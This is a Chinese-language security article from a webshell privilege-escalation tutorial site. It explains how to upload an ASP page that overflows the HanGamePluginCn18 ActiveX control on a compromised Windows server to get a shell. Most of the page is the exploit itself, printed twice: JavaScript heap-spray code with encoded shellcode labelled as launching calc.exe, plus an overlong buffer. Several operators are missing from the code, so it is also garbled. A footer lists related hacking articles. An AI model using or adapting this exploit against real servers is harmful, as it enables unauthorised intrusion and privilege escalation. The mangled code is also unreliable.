webshell中上傳asp文件調(diào)用服務(wù)器ActiveX控件溢出獲取shell
互聯(lián)網(wǎng) 發(fā)布時間:2008-10-08 19:36:04 作者:佚名
我要評論

做windows系統(tǒng)滲透測試的時候有webshell了,但是拿不到shell,用來提升權(quán)限,也是個很郁悶的事情。一般來說,使用mdb jet引擎的溢出比較常見,但是有時候根據(jù)服務(wù)器上安裝的第三方軟件,使用一些新的方法,或許能有一點轉(zhuǎn)機。這里主要描述一下調(diào)用activex溢出服務(wù)器的思
做windows系統(tǒng)滲透測試的時候有webshell了,但是拿不到shell,用來提升權(quán)限,也是個很郁悶的事情。一般來說,使用mdb jet引擎的溢出比較常見,但是有時候根據(jù)服務(wù)器上安裝的第三方軟件,使用一些新的方法,或許能有一點轉(zhuǎn)機。這里主要描述一下調(diào)用activex溢出服務(wù)器的思
Code:
Quote:
<%@ LANGUAGE = JavaScript %>
<%
var act=new ActiveXObject("HanGamePluginCn18.HanGamePluginCn18.1");
//run calc.exe
var shellcode = unescape("%uE8FC%u0044%u0000%u458B%u8B3C%u057C%u0178%u8BEF%u184F%u5F8B%u0120%u49EB%u348B%u018B%u31EE%u99C0%u84AC%u74C0%uC107%u0DCA%uC201%uF4EB%u543B%u0424%uE575%u5F8B%u0124%u66EB%u0C8B%u8B4B%u1C5F%uEB01%u1C8B%u018B%u89EB%u245C%uC304%uC031%u8B64%u3040%uC085%u0C78%u408B%u8B0C%u1C70%u8BAD%u0868%u09EB%u808B%u00B0%u0000%u688B%u5F3C%uF631%u5660%uF889%uC083%u507B%u7E68%uE2D8%u6873%uFE98%u0E8A%uFF57%u63E7%u6C61%u0063");
var bigblock = unescape("%u9090%u9090");
var headersize = 20;
var slackspace = headersize shellcode.length;
while (bigblock.length<slackspace) bigblock =bigblock;
fillblock = bigblock.substring(0, slackspace);
block = bigblock.substring(0, bigblock.length-slackspace);
while(block.length slackspace<0x40000) block = block block fillblock;
memory = new Array();
for (x=0; x<300; x ) memory[x] = block shellcode;
var buffer = ’’;
while (buffer.length < 1319) buffer ="A";
buffer=buffer "\x0a\x0a\x0a\x0a" buffer;
act.hgs_startNotify(buffer);
%>
Code:
Quote:
<%@ LANGUAGE = JavaScript %>
<%
var act=new ActiveXObject("HanGamePluginCn18.HanGamePluginCn18.1");
//run calc.exe
var shellcode = unescape("%uE8FC%u0044%u0000%u458B%u8B3C%u057C%u0178%u8BEF%u184F%u5F8B%u0120%u49EB%u348B%u018B%u31EE%u99C0%u84AC%u74C0%uC107%u0DCA%uC201%uF4EB%u543B%u0424%uE575%u5F8B%u0124%u66EB%u0C8B%u8B4B%u1C5F%uEB01%u1C8B%u018B%u89EB%u245C%uC304%uC031%u8B64%u3040%uC085%u0C78%u408B%u8B0C%u1C70%u8BAD%u0868%u09EB%u808B%u00B0%u0000%u688B%u5F3C%uF631%u5660%uF889%uC083%u507B%u7E68%uE2D8%u6873%uFE98%u0E8A%uFF57%u63E7%u6C61%u0063");
var bigblock = unescape("%u9090%u9090");
var headersize = 20;
var slackspace = headersize shellcode.length;
while (bigblock.length<slackspace) bigblock =bigblock;
fillblock = bigblock.substring(0, slackspace);
block = bigblock.substring(0, bigblock.length-slackspace);
while(block.length slackspace<0x40000) block = block block fillblock;
memory = new Array();
for (x=0; x<300; x ) memory[x] = block shellcode;
var buffer = ’’;
while (buffer.length < 1319) buffer ="A";
buffer=buffer "\x0a\x0a\x0a\x0a" buffer;
act.hgs_startNotify(buffer);
%>
相關(guān)文章
什么是CC攻擊 判斷網(wǎng)站是否被CC攻擊并且如何防御CC攻擊
CC主要是用來攻擊頁面的,大家都有這樣的經(jīng)歷,就是在訪問論壇時,如果這個論壇比較大,訪問的人比較多,打開頁面的速度會比較慢,對不?!一般來說,訪問的人越多,論壇的頁2024-01-06Windows系統(tǒng)安全風(fēng)險-本地NTLM重放提權(quán)
入侵者主要通過Potato程序攻擊擁有SYSTEM權(quán)限的端口偽造網(wǎng)絡(luò)身份認(rèn)證過程,利用NTLM重放機制騙取SYSTEM身份令牌,最終取得系統(tǒng)權(quán)限,該安全風(fēng)險微軟并不認(rèn)為存在漏洞,所以2021-04-15- 這篇文章主要介紹了文件上傳漏洞全面滲透分析小結(jié),這里主要為大家分享一下防御方法,需要的朋友可以參考下2021-03-21
- 這篇文章主要介紹了sql手工注入語句&SQL手工注入大全,需要的朋友可以參考下2017-09-06
- 這篇文章主要介紹了詳解Filezilla server 提權(quán),需要的朋友可以參考下2017-05-13
FileZilla Server 2008 x64 提權(quán)與防御方法
這篇文章主要介紹了FileZilla Server 2008 x64 提權(quán)與防御方法,需要的朋友可以參考下2017-05-13https加密也被破解 HEIST攻擊從加密數(shù)據(jù)獲取明文
不久之前我們說過關(guān)于http和https的區(qū)別,對于加密的https,我們一直認(rèn)為它是相對安全的,可今天要講的是,一種繞過HTTPS加密得到明文信息的web攻擊方式,不知道這消息對你2016-08-10iPhone和Mac也會被黑 一條iMessage密碼可能就被盜了
一直以來蘋果系統(tǒng)的安全性都是比安卓要高的,但是再安全的系統(tǒng)也免不了漏洞,蘋果也一樣。最近爆出的新漏洞,只需要接收一條多媒體信息或者iMessage就會導(dǎo)致用戶信息泄露。2016-07-27- 國家正在修正關(guān)于黑客方面的法律法規(guī),有一條震驚黑客圈的“世紀(jì)佳緣”起訴白帽黑客事件,深深的傷害了廣大黑客們的心,加上扎克伯格和特拉維斯·卡蘭尼克賬號被盜,于是黑2016-07-11
如何逆向破解HawkEye keylogger鍵盤記錄器進(jìn)入攻擊者郵箱
面對惡意郵件攻擊,我們就只能默默忍受被他攻擊,連自我保護(hù)能力都沒有談什么反抗?讓人痛快的是,如今有了解決辦法,逆向破解鍵盤記錄器,進(jìn)入攻擊者郵箱2016-07-06